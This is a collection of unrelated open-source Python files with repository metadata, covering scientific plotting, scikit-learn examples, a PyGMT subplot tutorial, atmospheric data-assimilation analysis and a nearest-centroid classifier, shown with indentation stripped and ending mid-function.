print "Failed to get address ranges, ensure simout is up-to-date"
exit(-1)
# Now parse the stats
raw_rd_lat = []
for line in stats:
match = re.match(".*readLatencyHist::mean\s+(.+)\s+#.*", line)
if match:
raw_rd_lat.append(float(match.groups(0)[0]) / 1000)
stats.close()
# The stats also contain the warming, so filter the latency stats
i = 0
filtered_rd_lat = []
for l in raw_rd_lat:
if i % (iterations + 1) == 0:
pass
else:
filtered_rd_lat.append(l)
i = i + 1
# Next we need to take care of the iterations
rd_lat = []
for i in range(iterations):
rd_lat.append(filtered_rd_lat[i::iterations])
final_rd_lat = map(lambda p: min(p), zip(*rd_lat))
# Sanity check
if not (len(ranges) == len(final_rd_lat)):
print "Address ranges (%d) and read latency (%d) do not match" % \
(len(ranges), len(final_rd_lat))
exit(-1)
for (r, l) in zip(ranges, final_rd_lat):
print r, round(l, 2)
# lazy version to check if an integer is a power of two
def is_pow2(num):
return num != 0 and ((num & (num - 1)) == 0)
plt.semilogx(ranges, final_rd_lat)
# create human readable labels
xticks_locations = [r for r in ranges if is_pow2(r)]
xticks_labels = []
for x in xticks_locations:
if x < 1024:
xticks_labels.append('%d kB' % x)
else:
xticks_labels.append('%d MB' % (x / 1024))
plt.xticks(xticks_locations, xticks_labels, rotation=-45)
plt.minorticks_off()
plt.xlim((xticks_locations[0], xticks_locations[-1]))
plt.ylabel("Latency (ns)")
plt.grid(True)
plt.show()
if __name__ == "__main__":
main()
| bsd-3-clause |
maojrs/riemann_book | exact_solvers/advection.py | 3 | 1870 |
import sys, os
import matplotlib.pyplot as plt
import numpy as np
from utils import riemann_tools
from ipywidgets import interact
from ipywidgets import widgets
def characteristics(a=1.):
x = np.linspace(-2*np.abs(a)-1,2*np.abs(a)+1,41)
t = np.linspace(0,1,20)
for ix in x:
plt.plot(ix+a*t,t,'-k',lw=0.5)
plt.xlim(0,1)
plt.ylim(0,1)
plt.title('Characteristics $x-at=C$')
plt.xlabel('$x$')
plt.ylabel('$t$')
def solution(a=1.):
characteristics(a)
plt.title('Propagation along characteristics')
xx = np.linspace(-2*np.abs(a),2*np.abs(a)+1,1000)
q = 0.1*np.exp(-100*(xx-0.5)**2)
plt.plot(xx,q,'-r')
spacing = 0.04
number = 20
for i in range(number):
plt.plot(xx+spacing*i*a,q+spacing*i,'-r')
def riemann_demo(a=1.):
characteristics(a)
plt.xlim(-0.8,0.8)
plt.title('Solution of the Riemann problem')
xx = np.linspace(-2*np.abs(a)-1,2*np.abs(a)+1,1000)
#q = 0.05+0.05*(xx<0.)
q = 0.05*(xx<0.)
spacing = 0.04
number = 20
for i in range(number):
plt.plot(xx+spacing*i*a,q+spacing*i,'-r')
def riemann_solution(q_l, q_r, a=1.):
"""
Solve the Riemann problem for the advection equation, with velocity a.
"""
states = np.array([[q_l, q_r]])
speeds = [a]
wave_types = ['contact']
def reval(xi):
q = np.zeros((1,len(xi)))
q[0,:] = (xi<a)*q_l + (xi>=a)*q_r
return q
return states, speeds, reval, wave_types
def plot_riemann_solution(ql, qr, a):
c = lambda q, xi: a
soln = riemann_solution(ql ,qr, a)
plot_advection = riemann_tools.make_plot_function(*soln,
plot_chars=[c])
return interact(plot_advection,
t=widgets.FloatSlider(value=0.0,min=0,max=1.0),
which_char=widgets.fixed(True))
| bsd-3-clause |
btabibian/scikit-learn | examples/model_selection/grid_search_text_feature_extraction.py | 99 | 4163 |
"""
==========================================================
Sample pipeline for text feature extraction and evaluation
==========================================================
The dataset used in this example is the 20 newsgroups dataset which will be
automatically downloaded and then cached and reused for the document
classification example.
You can adjust the number of categories by giving their names to the dataset
loader or setting them to None to get the 20 of them.
Here is a sample output of a run on a quad-core machine::
Loading 20 newsgroups dataset for categories:
['alt.atheism', 'talk.religion.misc']
1427 documents
2 categories
Performing grid search...
pipeline: ['vect', 'tfidf', 'clf']
parameters:
{'clf__alpha': (1.0000000000000001e-05, 9.9999999999999995e-07),
'clf__n_iter': (10, 50, 80),
'clf__penalty': ('l2', 'elasticnet'),
'tfidf__use_idf': (True, False),
'vect__max_n': (1, 2),
'vect__max_df': (0.5, 0.75, 1.0),
'vect__max_features': (None, 5000, 10000, 50000)}
done in 1737.030s
Best score: 0.940
Best parameters set:
clf__alpha: 9.9999999999999995e-07
clf__n_iter: 50
clf__penalty: 'elasticnet'
tfidf__use_idf: True
vect__max_n: 2
vect__max_df: 0.75
vect__max_features: 50000
"""
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
from __future__ import print_function
from pprint import pprint
from time import time
import logging
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
print(__doc__)
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
###############################################################################
# Load some categories from the training set
categories = [
'alt.atheism',
'talk.religion.misc',
]
# Uncomment the following to do the analysis on all the categories
#categories = None
print("Loading 20 newsgroups dataset for categories:")
print(categories)
data = fetch_20newsgroups(subset='train', categories=categories)
print("%d documents" % len(data.filenames))
print("%d categories" % len(data.target_names))
print()
###############################################################################
# define a pipeline combining a text feature extractor with a simple
# classifier
pipeline = Pipeline([
('vect', CountVectorizer()),
('tfidf', TfidfTransformer()),
('clf', SGDClassifier()),
])
# uncommenting more parameters will give better exploring power but will
# increase processing time in a combinatorial way
parameters = {
'vect__max_df': (0.5, 0.75, 1.0),
#'vect__max_features': (None, 5000, 10000, 50000),
'vect__ngram_range': ((1, 1), (1, 2)), # unigrams or bigrams
#'tfidf__use_idf': (True, False),
#'tfidf__norm': ('l1', 'l2'),
'clf__alpha': (0.00001, 0.000001),
'clf__penalty': ('l2', 'elasticnet'),
#'clf__n_iter': (10, 50, 80),
}
if __name__ == "__main__":
# multiprocessing requires the fork to happen in a __main__ protected
# block
# find the best parameters for both the feature extraction and the
# classifier
grid_search = GridSearchCV(pipeline, parameters, n_jobs=-1, verbose=1)
print("Performing grid search...")
print("pipeline:", [name for name, _ in pipeline.steps])
print("parameters:")
pprint(parameters)
t0 = time()
grid_search.fit(data.data, data.target)
print("done in %0.3fs" % (time() - t0))
print()
print("Best score: %0.3f" % grid_search.best_score_)
print("Best parameters set:")
best_parameters = grid_search.best_estimator_.get_params()
for param_name in sorted(parameters.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
| bsd-3-clause |
bikong2/scikit-learn | examples/svm/plot_svm_anova.py | 250 | 2000 | """
=================================================
SVM-Anova: SVM with univariate feature selection
=================================================
This example shows how to perform univariate feature before running a SVC
(support vector classifier) to improve the classification scores.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets, feature_selection, cross_validation
from sklearn.pipeline import Pipeline
###############################################################################
# Import some data to play with
digits = datasets.load_digits()
y = digits.target
# Throw away data, to be in the curse of dimension settings
y = y[:200]
X = digits.data[:200]
n_samples = len(y)
X = X.reshape((n_samples, -1))
# add 200 non-informative features
X = np.hstack((X, 2 * np.random.random((n_samples, 200))))
###############################################################################
# Create a feature-selection transform and an instance of SVM that we
# combine together to have an full-blown estimator
transform = feature_selection.SelectPercentile(feature_selection.f_classif)
clf = Pipeline([('anova', transform), ('svc', svm.SVC(C=1.0))])
###############################################################################
# Plot the cross-validation score as a function of percentile of features
score_means = list()
score_stds = list()
percentiles = (1, 3, 6, 10, 15, 20, 30, 40, 60, 80, 100)
for percentile in percentiles:
clf.set_params(anova__percentile=percentile)
# Compute cross-validation score using all CPUs
this_scores = cross_validation.cross_val_score(clf, X, y, n_jobs=1)
score_means.append(this_scores.mean())
score_stds.append(this_scores.std())
plt.errorbar(percentiles, score_means, np.array(score_stds))
plt.title(
'Performance of the SVM-Anova varying the percentile of features selected')
plt.xlabel('Percentile')
plt.ylabel('Prediction rate')
plt.axis('tight')
plt.show()
| bsd-3-clause |
GenericMappingTools/gmt-python | examples/tutorials/subplots.py | 1 | 10360 | """
Making subplots
===============
When you're preparing a figure for a paper, there will often be times when
you'll need to put many individual plots into one large figure, and label them
'abcd'. These individual plots are called subplots.
There are two main ways to create subplots in GMT:
- Use :meth:`pygmt.Figure.shift_origin` to manually move each individual plot
to the right position.
- Use :meth:`pygmt.Figure.subplot` to define the layout of the subplots.
The first method is easier to use and should handle simple cases involving a
couple of subplots. For more advanced subplot layouts, however, we recommend the
use of :meth:`pygmt.Figure.subplot` which offers finer grained control, and
this is what the tutorial below will cover.
"""
# sphinx_gallery_thumbnail_number = 3
import pygmt
###############################################################################
#
# Let's start by initializing a :class:`pygmt.Figure` instance.
fig = pygmt.Figure()
###############################################################################
# Define subplot layout
# ---------------------
#
# The :meth:`pygmt.Figure.subplot` function is used to set up the layout, size,
# and other attributes of the figure. It divides the whole canvas into regular
# grid areas with *n* rows and *m* columns. Each grid area can contain an
# individual subplot. For example:
###############################################################################
# .. code-block:: default
#
# with fig.subplot(nrows=2, ncols=3, figsize=("15c", "6c"), frame="lrtb"):
# ...
###############################################################################
# will define our figure to have a 2 row and 3 column grid layout.
# ``figsize=("15c", "6c")`` defines the overall size of the figure to be 15 cm
# wide by 6 cm high. Using ``frame="lrtb"`` allows us to customize the map frame
# for all subplots instead of setting them individually. The figure layout will
# look like the following:
with fig.subplot(nrows=2, ncols=3, figsize=("15c", "6c"), frame="lrtb"):
for i in range(2): # row number starting from 0
for j in range(3): # column number starting from 0
index = i * 3 + j # index number starting from 0
with fig.set_panel(panel=index): # sets the current panel
fig.text(
position="MC",
text=f"index: {index}; row: {i}, col: {j}",
region=[0, 1, 0, 1],
)
fig.show()
###############################################################################
# The :meth:`pygmt.Figure.set_panel` function activates a specified subplot, and
# all subsequent plotting functions will take place in that subplot panel. This
# is similar to matplotlib's ``plt.sca`` method. In order to specify a subplot,
# you will need to provide the identifier for that subplot via the ``panel``
# parameter. Pass in either the *index* number, or a tuple/list like
# (*row*, *col*) to ``panel``.
###############################################################################
# .. note::
#
# The row and column numbering starts from 0. So for a subplot layout with
# N rows and M columns, row numbers will go from 0 to N-1, and column
# numbers will go from 0 to M-1.
###############################################################################
# For example, to activate the subplot on the top right corner (index: 2) at
# *row*\=0 and *col*\=2, so that all subsequent plotting commands happen
# there, you can use the following command:
###############################################################################
# .. code-block:: default
#
# with fig.set_panel(panel=[0, 2]):
# ...
###############################################################################
# Making your first subplot
# -------------------------
# Next, let's use what we learned above to make a 2 row by 2 column subplot
# figure. We'll also pick up on some new parameters to configure our subplot.
fig = pygmt.Figure()
with fig.subplot(
nrows=2,
ncols=2,
figsize=("15c", "6c"),
autolabel=True,
frame=["af", "WSne"],
margins=["0.1c", "0.2c"],
title="My Subplot Heading",
):
fig.basemap(region=[0, 10, 0, 10], projection="X?", panel=[0, 0])
fig.basemap(region=[0, 20, 0, 10], projection="X?", panel=[0, 1])
fig.basemap(region=[0, 10, 0, 20], projection="X?", panel=[1, 0])
fig.basemap(region=[0, 20, 0, 20], projection="X?", panel=[1, 1])
fig.show()
###############################################################################
# In this example, we define a 2-row, 2-column (2x2) subplot layout using
# :meth:`pygmt.Figure.subplot`. The overall figure dimensions is set to be
# 15 cm wide and 6 cm high (``figsize=["15c", "6c"]``). In addition, we use
# some optional parameters to fine-tune some details of the figure creation:
#
# - ``autolabel=True``: Each subplot is automatically labelled abcd
# - ``margins=["0.1c", "0.2c"]``: adjusts the space between adjacent subplots.
# In this case, it is set as 0.1 cm in the X direction and 0.2 cm in the Y
# direction.
# - ``title="My Subplot Heading"``: adds a title on top of the whole figure.
#
# Notice that each subplot was set to use a linear projection ``"X?"``.
# Usually, we need to specify the width and height of the map frame, but it is
# also possible to use a question mark ``"?"`` to let GMT decide automatically
# on what is the most appropriate width/height for the each subplot's map
# frame.
###############################################################################
# .. tip::
#
# In the above example, we used the following commands to activate the
# four subplots explicitly one after another::
#
# fig.basemap(..., panel=[0, 0])
# fig.basemap(..., panel=[0, 1])
# fig.basemap(..., panel=[1, 0])
# fig.basemap(..., panel=[1, 1])
#
# In fact, we can just use ``fig.basemap(..., panel=True)`` without
# specifying any subplot index number, and GMT will automatically activate
# the next subplot panel.
###############################################################################
# .. note::
#
# All plotting functions (e.g. :meth:`pygmt.Figure.coast`,
# :meth:`pygmt.Figure.text`, etc) are able to use ``panel`` parameter when
# in subplot mode. Once a panel is activated using ``panel`` or
# :meth:`pygmt.Figure.set_panel`, subsequent plotting commands that don't
# set a ``panel`` will have their elements added to the same panel as
# before.
###############################################################################
# Shared X and Y axis labels
# --------------------------
# In the example above with the four subplots, the two subplots for each row
# have the same Y-axis range, and the two subplots for each column have the
# same X-axis range. You can use the ``sharex``/``sharey`` parameters to set a
# common X and/or Y axis between subplots.
fig = pygmt.Figure()
with fig.subplot(
nrows=2,
ncols=2,
figsize=("15c", "6c"), # width of 15 cm, height of 6 cm
autolabel=True,
margins=["0.3c", "0.2c"], # horizontal 0.3 cm and vertical 0.2 cm margins
title="My Subplot Heading",
sharex="b", # shared x-axis on the bottom side
sharey="l", # shared y-axis on the left side
frame="WSrt",
):
fig.basemap(region=[0, 10, 0, 10], projection="X?", panel=True)
fig.basemap(region=[0, 20, 0, 10], projection="X?", panel=True)
fig.basemap(region=[0, 10, 0, 20], projection="X?", panel=True)
fig.basemap(region=[0, 20, 0, 20], projection="X?", panel=True)
fig.show()
###############################################################################
# ``sharex="b"`` indicates that subplots in a column will share the x-axis, and
# only the **b**\ ottom axis is displayed. ``sharey="l"`` indicates that
# subplots within a row will share the y-axis, and only the **l**\ eft axis is
# displayed.
#
# Of course, instead of using the ``sharex``/``sharey`` option, you can also
# set a different ``frame`` for each subplot to control the axis properties
# individually for each subplot.
###############################################################################
# Advanced subplot layouts
# ------------------------
#
# Nested subplot are currently not supported. If you want to create more
# complex subplot layouts, some manual adjustments are needed.
#
# The following example draws three subplots in a 2-row, 2-column layout, with
# the first subplot occupying the first row.
fig = pygmt.Figure()
# Bottom row, two subplots
with fig.subplot(nrows=1, ncols=2, figsize=("15c", "3c"), autolabel="b)"):
fig.basemap(
region=[0, 5, 0, 5], projection="X?", frame=["af", "WSne"], panel=[0, 0]
)
fig.basemap(
region=[0, 5, 0, 5], projection="X?", frame=["af", "WSne"], panel=[0, 1]
)
# Move plot origin by 1 cm above the height of the entire figure
fig.shift_origin(yshift="h+1c")
# Top row, one subplot
with fig.subplot(nrows=1, ncols=1, figsize=("15c", "3c"), autolabel="a)"):
fig.basemap(
region=[0, 10, 0, 10], projection="X?", frame=["af", "WSne"], panel=[0, 0]
)
fig.text(text="TEXT", x=5, y=5)
fig.show()
###############################################################################
#
# We start by drawing the bottom two subplots, setting ``autolabel="b)"`` so
# that the subplots are labelled 'b)' and 'c)'. Next, we use
# :meth:`pygmt.Figure.shift_origin` to move the plot origin 1 cm above the
# **h**\ eight of the entire figure that is currently plotted (i.e. the bottom
# row subplots). A single subplot is then plotted on the top row. You may need
# to adjust the ``yshift`` parameter to make your plot look nice. This top row
# uses ``autolabel="a)"``, and we also plotted some text inside. Note that
# ``projection="X?"`` was used to let GMT automatically determine the size of
# the subplot according to the size of the subplot area.
###############################################################################
# You can also manually override the ``autolabel`` for each subplot using for
# example, ``fig.set_panel(..., fixedlabel="b) Panel 2")`` which would allow
# you to manually label a single subplot as you wish. This can be useful for
# adding a more descriptive subtitle to individual subplots.
| bsd-3-clause |
nicolagritti/ACVU_project | source/03cropImages.py | 1 | 1947 | import glob
from tifffile import *
from generalFunctions import *
import numpy as np
import os.path
import matplotlib.pyplot as plt
import pickle
import scipy.interpolate as ip
from scipy.stats import gaussian_kde
from scipy import interpolate
import shutil
import os
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42
def cropImages( path, worm, channels = ['488nm','CoolLED','561nm'], size = 512 ):
print( path, worm )
rawImgsPath = os.path.join( path, worm )
# load pickle files
paramsDF = load_data_frame( path, worm + '_01params.pickle' )
timesDF = load_data_frame( path, worm + '_01times.pickle' )
gpDF = load_data_frame( path, worm + '_02gonadPos.pickle' )
# build the movie for each of the input channels
outpath = os.path.join( path, worm + '_analyzedImages' )
for channel in channels:
for idx, row in timesDF.iterrows():
# extract gonad position
gp = extract_pos( gpDF.ix[ gpDF.tidx == row.tidxRel ].squeeze() )
# if the gonad is marked
if not np.sum( np.isnan( gp ) ):
print( row.tidxRel, row.timesRel, row.fName + channel + '.tif' )
# copy metadatafile
if not os.path.isfile( os.path.join( outpath, row.fName + '.txt' ) ):
shutil.copyfile( os.path.join( rawImgsPath, row.fName + '.txt' ), os.path.join( outpath, row.fName + '.txt' ) )
if not os.path.isfile( os.path.join( outpath, row.fName + channel + '.tif' ) ):
# load the Z-stack
imgs = load_stack( os.path.join( rawImgsPath, row.fName + channel + '.tif') )
# crop the Z-stack
cropstack = crop_image( imgs, gp, size )
# save Z-stack
imsave( os.path.join( outpath, row.fName + channel + '.tif' ), cropstack.astype( np.uint16 ) )
if __name__ == '__main__':
path = 'X:\\Simone\\160129_MCHERRY_HLH2GFP_onHB101'
worms = ['C14','C15','C16','C17','C18','C19']
wprms = ['C16']
for w in worms:
cropImages( path = path, worm = w , channels = ['488nm','CoolLED','561nm'] )
| gpl-3.0 |
gustfrontar/LETKF_WRF | wrf/verification/python/plot_letkfpertamp_timeseries.py | 1 | 7226 | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 1 18:45:15 2016
@author:
"""
# LECTURA Y GRAFICADO RADAR (Formato binario GVAR-SMN)
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
import binary_io as bio
import bred_vector_functions as bvf
import os
basedir='/data9/jruiz/EXPERIMENTS/'
expname = '/OsakaPAR_1km_control1000m_smallrandompert_new/'
plotbasedir=basedir + expname + '/plots/'
inipert=1 #Initial perturbation to plot.
endpert=1 #Final perturbation to plot.
npert=endpert-inipert + 1
undef_out=np.nan #This is the undef value that we will use internally.
undef_in=1.0e20 #This is the undef value in the original data (or at least a big number that is lower than the real undef value).
#The following will be used to extract a particlar variable from the original data.
#This variables should be especified according to the data that we have in the binary files.
ctl_vars='U','V','W','T','QV','QHYD' #Complete list of variables in ctl file.
ctl_inirecord=[0,12,24,36,48,60] #Starting record for each variable. From 0 to N
ctl_endrecord=[11,23,35,47,59,71] #End record for each variable. From 0 to N.
#Which variables and levels are we going to plot?
plotlevels=np.array([3,7,9]) #Which levels will be plotted (this levels are equivalent to the BV plots)
plotvars='UV','V','W','T','QV','QHYD' #Which variables will be plotted.
#Define regions
lati=np.array([34.75,34.6])
late=np.array([35.25,34.9])
loni=np.array([135.5,135.4])
lone=np.array([136.25,135.7])
reg_name='REG_1','REG_2','TOTAL'
smooth_type='None'
smooth_sigma=np.array([1.5])
#Create the plotbasedir
if not os.path.exists(plotbasedir):
os.mkdir(plotbasedir)
#Defini initial and end times using datetime module.
itime = dt.datetime(2013,7,13,5,10,30) #Initial time.
etime = dt.datetime(2013,7,13,5,40,00) #End time.
#Define the delta.
delta=dt.timedelta(seconds=30)
nx=180
ny=180
nz=np.max(ctl_endrecord) + 1 #Total number of records in binary file.
nlev=12 #Number of vertical levels for 3D variables.
ntimes=1 + np.around((etime-itime).seconds / delta.seconds).astype(int) #Total number of times.
ctime = itime + delta
data_pert_gues=dict()
data_mean_gues=dict()
data_pert_anal=dict()
data_mean_anal=dict()
#Get lat lon.
lat=bio.read_data_direct(basedir + expname + '/latlon/lat.grd',nx,ny,1,'>f4')[:,:,0]
lon=bio.read_data_direct(basedir + expname + '/latlon/lon.grd',nx,ny,1,'>f4')[:,:,0]
time_mean_growth_rate=np.zeros([nx,ny,nlev])
time_sprd_growth_rate=np.zeros([nx,ny,nlev])
time_mean_norm=np.zeros([nx,ny,nlev])
time_sprd_norm=np.zeros([nx,ny,nlev])
#Convert lat lon to the nearest grid point.
#Add the global domain as a region.
lati=np.append(lati,lat[0,0])
late=np.append(late,lat[nx-1,ny-1])
loni=np.append(loni,lon[0,0])
lone=np.append(lone,lon[nx-1,ny-1])
xi , yi = bvf.lat_lon_to_i_j(lon,lat,loni,lati)
xe , ye = bvf.lat_lon_to_i_j(lon,lat,lone,late)
nregs=xi.shape[0]
norm_mean_gues=dict()
norm_max_gues=dict()
norm_min_gues=dict()
norm_mean_anal=dict()
norm_max_anal=dict()
norm_min_anal=dict()
gr_letkfpert_mean=dict()
gr_letkfpert_min=dict()
gr_letkfpert_max=dict()
#Allocate memory for the dictionaries.
for myvar in plotvars :
norm_mean_gues[myvar]=np.zeros([ntimes,npert,nregs])
norm_max_gues[myvar]=np.zeros([ntimes,npert,nregs])
norm_min_gues[myvar]=np.zeros([ntimes,npert,nregs])
norm_mean_anal[myvar]=np.zeros([ntimes,npert,nregs])
norm_max_anal[myvar]=np.zeros([ntimes,npert,nregs])
norm_min_anal[myvar]=np.zeros([ntimes,npert,nregs])
gr_letkfpert_mean[myvar]=np.zeros([ntimes,npert,nregs])
gr_letkfpert_min[myvar]=np.zeros([ntimes,npert,nregs])
gr_letkfpert_max[myvar]=np.zeros([ntimes,npert,nregs])
for ipert in range (inipert , endpert + 1):
pertstr="%04d" % ipert
#print( ' Plotting bred vector number ' + bvstr )
while ( ctime <= etime ):
it = ( ctime - itime ).seconds / delta.seconds
print ( 'The date is :', ctime )
print ( 'Reading the perturbed gues' )
my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/guesgp/' + '/' + pertstr + '.grd'
data_pert_gues=bio.read_data_scale_2( my_file , nx , ny , nz , ctl_vars , ctl_inirecord , ctl_endrecord ,dtypein='f4',undef_in=undef_in,undef_out=undef_out)
print ( 'Reading the mean gues')
my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/guesgp/' + '/mean.grd'
data_mean_gues=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)
print ( 'Reading the perturbed anal' )
my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/analgp/' + '/' + pertstr + '.grd'
data_pert_anal=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)
print ( 'Reading the mean anal')
my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/analgp/' + '/mean.grd'
data_mean_anal=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)
for my_var in plotvars :
norm_mean_gues[my_var][it,ipert-1,:],norm_max_gues[my_var][it,ipert-1,:],norm_min_gues[my_var][it,ipert-1,:],norm_gues=bvf.norm_bv( data_pert_gues , data_mean_gues , norm_type=my_var , smooth=smooth_type , sigma=smooth_sigma , xi=xi , yi=yi , xe=xe , ye=ye )
norm_mean_anal[my_var][it,ipert-1,:],norm_max_anal[my_var][it,ipert-1,:],norm_min_anal[my_var][it,ipert-1,:],norm_anal=bvf.norm_bv( data_pert_anal , data_mean_anal , norm_type=my_var , smooth=smooth_type , sigma=smooth_sigma , xi=xi , yi=yi , xe=xe , ye=ye )
ctime = ctime + delta
it = it + 1
print ( "Finish time loop" )
mybv=0
mydir=plotbasedir + '/time_independent_plots/' + '/' + pertstr + '/'
#Plot norm time series.
#bvf.plot_norm_timeseries(norm_mean_o,norm_mean_i,norm_mean_r,plotvars,reg_name,mydir,mybv,'norm_mean',figsize='None')
plot_reg_name = True
figsize=bvf.default_figure_size
figextension='.png'
#Create output directory
if not os.path.exists(plotbasedir):
os.makedirs(plotbasedir)
#Create time series.
time_serie=np.nan*np.zeros([ntimes*2,npert,nregs])
times=np.nan*np.zeros(ntimes*2)
for myvar in plotvars :
for ii in range(0,ntimes-1) :
for ipert in range(inipert,endpert+1) :
#Creamos un grafico tipo serrucho para representar la evolucion de la norma.
time_serie[2*ii,ipert-1,:]=norm_mean_anal[myvar][ii,ipert-1,:]
time_serie[2*ii+1,ipert-1,:]=norm_mean_gues[myvar][ii+1,ipert-1,:]
times[2*ii]=ii
times[2*ii+1]=ii+1
for ireg in range(0,nregs) :
iregstr="%04d" % ( ireg + 1 )
fig=plt.figure(1,figsize=figsize)
for ipert in range(inipert,endpert+1) :
plt.plot(times,time_serie[:,ipert-1,ireg],'-')
plt.ylabel('Norm')
plt.xlabel('Time')
#if debug == True :
plt.show()
print( 'Generationg the following figure : ' + 'Figure_' + '_pertamptimeserie_' + myvar + 'reg' + iregstr + figextension )
plt.savefig( plotbasedir + 'Figure_' + '_pertamptimeserie_' + myvar + 'reg' + iregstr + figextension )
plt.close(fig)
| gpl-3.0 |
glennq/scikit-learn | sklearn/neighbors/nearest_centroid.py | 37 | 7348 | # -*- coding: utf-8 -*-
"""
Nearest Centroid Classification
"""
# Author: Robert Layton <robertlayton@gmail.com>
# Olivier Grisel <olivier.grisel@ensta.org>
#
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import sparse as sp
from ..base import BaseEstimator, ClassifierMixin
from ..metrics.pairwise import pairwise_distances
from ..preprocessing import LabelEncoder
from ..utils.validation import check_array, check_X_y, check_is_fitted
from ..utils.sparsefuncs import csc_median_axis_0
from ..utils.multiclass import check_classification_targets
class NearestCentroid(BaseEstimator, ClassifierMixin):
"""Nearest centroid classifier.
Each class is represented by its centroid, with test samples classified to
the class with the nearest centroid.
Read more in the :ref:`User Guide <nearest_centroid_classifier>`.
Parameters
----------
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string or callable, it must be one of
the options allowed by metrics.pairwise.pairwise_distances for its
metric parameter.
The centroids for the samples corresponding to each class is the point
from which the sum of the distances (according to the metric) of all
samples that belong to that particular class are minimized.
If the "manhattan" metric is provided, this centroid is the median and
for all other metrics, the centroid is now set to be the mean.
shrink_threshold : float, optional (default = None)
Threshold for shrinking centroids to remove features.
Attributes
----------
centroids_ : array-like, shape = [n_classes, n_features]
Centroid of each class
Examples
--------
>>> from sklearn.neighbors.nearest_centroid import NearestCentroid
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = NearestCentroid()
>>> clf.fit(X, y)
NearestCentroid(metric='euclidean', shrink_threshold=None)
>>> print(clf.predict([[-0.8, -1]]))
[1]
See also
--------
sklearn.neighbors.KNeighborsClassifier: nearest neighbors classifier
Notes
-----
When used for text classification with tf-idf vectors, this classifier is
also known as the Rocchio classifier.
References
----------
Tibshirani, R., Hastie, T., Narasimhan, B., & Chu, G. (2002). Diagnosis of
multiple cancer types by shrunken centroids of gene expression. Proceedings
of the National Academy of Sciences of the United States of America,
99(10), 6567-6572. The National Academy of Sciences.
"""
def __init__(self, metric='euclidean', shrink_threshold=None):
self.metric = metric
self.shrink_threshold = shrink_threshold
def fit(self, X, y):
"""
Fit the NearestCentroid model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Note that centroid shrinking cannot be used with sparse matrices.
y : array, shape = [n_samples]
Target values (integers)
"""
# If X is sparse and the metric is "manhattan", store it in a csc
# format is easier to calculate the median.
if self.metric == 'manhattan':
X, y = check_X_y(X, y, ['csc'])
else:
X, y = check_X_y(X, y, ['csr', 'csc'])
is_X_sparse = sp.issparse(X)
if is_X_sparse and self.shrink_threshold:
raise ValueError("threshold shrinking not supported"
" for sparse input")
check_classification_targets(y)
n_samples, n_features = X.shape
le = LabelEncoder()
y_ind = le.fit_transform(y)
self.classes_ = classes = le.classes_
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
# Mask mapping each class to its members.
self.centroids_ = np.empty((n_classes, n_features), dtype=np.float64)
# Number of clusters in each class.
nk = np.zeros(n_classes)
for cur_class in range(n_classes):
center_mask = y_ind == cur_class
nk[cur_class] = np.sum(center_mask)
if is_X_sparse:
center_mask = np.where(center_mask)[0]
# XXX: Update other averaging methods according to the metrics.
if self.metric == "manhattan":
# NumPy does not calculate median of sparse matrices.
if not is_X_sparse:
self.centroids_[cur_class] = np.median(X[center_mask], axis=0)
else:
self.centroids_[cur_class] = csc_median_axis_0(X[center_mask])
else:
if self.metric != 'euclidean':
warnings.warn("Averaging for metrics other than "
"euclidean and manhattan not supported. "
"The average is set to be the mean."
)
self.centroids_[cur_class] = X[center_mask].mean(axis=0)
if self.shrink_threshold:
dataset_centroid_ = np.mean(X, axis=0)
# m parameter for determining deviation
m = np.sqrt((1. / nk) + (1. / n_samples))
# Calculate deviation using the standard deviation of centroids.
variance = (X - self.centroids_[y_ind]) ** 2
variance = variance.sum(axis=0)
s = np.sqrt(variance / (n_samples - n_classes))
s += np.median(s) # To deter outliers from affecting the results.
mm = m.reshape(len(m), 1) # Reshape to allow broadcasting.
ms = mm * s
deviation = ((self.centroids_ - dataset_centroid_) / ms)
# Soft thresholding: if the deviation crosses 0 during shrinking,
# it becomes zero.
signs = np.sign(deviation)
deviation = (np.abs(deviation) - self.shrink_threshold)
deviation[deviation < 0] = 0
deviation *= signs
# Now adjust the centroids using the deviation
msd = ms * deviation
self.centroids_ = dataset_centroid_[np.newaxis, :] + msd
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
Notes
-----
If the metric constructor parameter is "precomputed", X is assumed to
be the distance matrix between the data to be predicted and
``self.centroids_``.
"""
check_is_fitted(self, 'centroids_')
X = check_array(X, accept_sparse='csr')
return self.classes_[pairwise_distances(
